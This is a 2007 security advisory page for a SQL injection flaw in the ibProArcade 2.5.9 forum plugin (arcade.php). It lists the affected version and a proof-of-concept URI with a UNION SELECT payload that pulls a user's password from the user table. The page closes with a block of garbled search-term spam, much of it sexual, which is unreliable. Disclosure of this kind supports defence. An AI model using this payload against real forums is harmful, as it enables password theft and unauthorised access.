about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ibProArcade Arcade.PHP SQL Injection Vulnerability


Title ibProArcade Arcade.PHP SQL Injection Vulnerability
Published 2007-02-15-12:00AM
Updated 2007-02-15-06:57PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  sp00k is credited with the discovery of this vulnerability.
Vulnerable  ibProArcade ibProArcade 2.5.9
Not Vulnerable  
Code   Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/forum/arcade.php?act=Arcade%20search_type=0&gsearch=' union select password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where userid = USERID /*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 10 Jan 2009 01:54:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ileanasexm vdeck pane tamil blue www.gogirl Papolar www.freeon components ftsex vieos Animation sexy vedio Dasibaba.c 30-50pld y www.animal www.125hac 200 /compo sexy girl telnet win IPB 1.2 89sexx.com mysql 4.1. news for c www.cowlis www.125hac javascript Sexe imegi WWW.Gadis Virtual Gi phpMyAdmin Sex poto lisbiansex xxxvidao Waptrick s sonicmaile Video porn Waptrick s www.radiof CMS is Fre index.php? pak sex news for c angelika p p o r n PHPforum www.125hac 72.232.222 mambo Remo 4Images Ga Xxx.Girl c downlo